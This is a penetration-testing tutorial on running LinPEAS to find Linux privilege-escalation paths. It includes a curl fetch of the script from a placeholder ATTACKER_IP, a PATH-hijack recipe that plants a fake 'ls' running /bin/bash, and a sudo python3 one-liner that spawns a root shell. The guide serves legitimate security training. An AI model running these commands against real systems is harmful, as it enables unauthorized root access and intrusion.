Privilege escalation is one of the most critical phases of a penetration test. After gaining initial access to a Linux system, the next goal is often elevating privileges to root. LinPEAS (Linux Privilege Escalation Awesome Script) automates the enumeration process, scanning the system for hundreds of known misconfigurations, weak permissions, and exploitable conditions.
What Is LinPEAS?
LinPEAS is a shell script from the PEASS-ng project maintained by CarlosPolop. It doesn’t perform exploitation itself — it enumerates potential vectors and highlights them with color-coded output (red/yellow = high interest, blue = info). Think of it as a comprehensive checklist running in seconds rather than hours.
Getting LinPEAS onto the Target
On your attack machine, download the latest release:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
Transfer it to the target using any available method:
# Option 1: Python HTTP server
python3 -m http.server 8000
# On target:
curl http://ATTACKER_IP:8000/linpeas.sh -o /tmp/linpeas.sh
# Option 2: SCP (if credentials known)
scp linpeas.sh user@TARGET_IP:/tmp/
# Option 3: Base64 encode and paste
cat linpeas.sh | base64 -w0
# On target, decode and write to disk
Once transferred, make it executable:
chmod +x /tmp/linpeas.sh
Running LinPEAS
Basic execution — output color-coded to terminal:
/tmp/linpeas.sh
Save output to a file (colors preserved via tee):
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
Run faster with reduced checks (good for time-constrained CTFs):
/tmp/linpeas.sh -s
Run only specific sections using flags. For example, to check only process and network info:
/tmp/linpeas.sh -p # processes
/tmp/linpeas.sh -n # network
Key Areas LinPEAS Checks
SUID/SGID Binaries
SUID binaries run as their owner (often root) regardless of who executes them. LinPEAS highlights unusual SUID binaries:
# Manual equivalent
find / -perm -4000 -type f 2>/dev/null
Check GTFOBins for known SUID exploits on binaries like vim, find, python, nmap, and bash.
Writable Cron Jobs
If a script run by root’s crontab is world-writable, you can inject commands:
# LinPEAS flags these — verify manually:
cat /etc/crontab
ls -la /etc/cron.d/
Sudo Privileges
LinPEAS runs sudo -l to list allowed commands without requiring a password:
sudo -l
If output shows something like (ALL) NOPASSWD: /usr/bin/vim, check GTFOBins for the escalation path.
Weak File Permissions
LinPEAS checks for writable /etc/passwd, /etc/shadow, and sensitive configuration files. A writable /etc/passwd lets you add a root user directly.
PATH Injection
If a root-owned script calls binaries without absolute paths, and you control a directory early in $PATH, you can hijack execution:
export PATH=/tmp:$PATH
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
Kernel Exploits
LinPEAS outputs the kernel version and flags known CVEs. Cross-reference with exploit-db or tools like linux-exploit-suggester:
uname -r
Common kernel exploits: DirtyPipe (CVE-2022-0847), DirtyCOW (CVE-2016-5195), PwnKit (CVE-2021-4034).
Interpreting the Output
LinPEAS uses color to prioritize findings:
- Red on yellow background: 99% chance of privilege escalation vector
- Red: Highly interesting
- Yellow: Worth investigating
- Green: Low-risk info (users, networking)
- Blue/Cyan: Info only
Focus on red findings first. A typical output might look like:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on target:
env_reset, mail_badpass
User www-data may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/python3
This is a clear escalation path: sudo python3 -c 'import os; os.system("/bin/bash")' gives root.
LinPEAS is a starting point, not the whole answer. Combine it with:
- pspy: Monitor processes without root — catch cron jobs running as root in real time
- linux-exploit-suggester: Focused kernel CVE lookup
- LinEnum: Alternative enumeration script for comparison
# pspy
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64 && ./pspy64
Cleaning Up
In authorized tests, remove artifacts after enumerating:
rm /tmp/linpeas.sh /tmp/linpeas_output.txt
Practice Environments
The best way to learn LinPEAS is through hands-on labs with known escalation paths:
LinPEAS is an essential tool in any pentester’s toolkit. Run it early, read the red items carefully, and combine findings with manual verification to chain your path to root.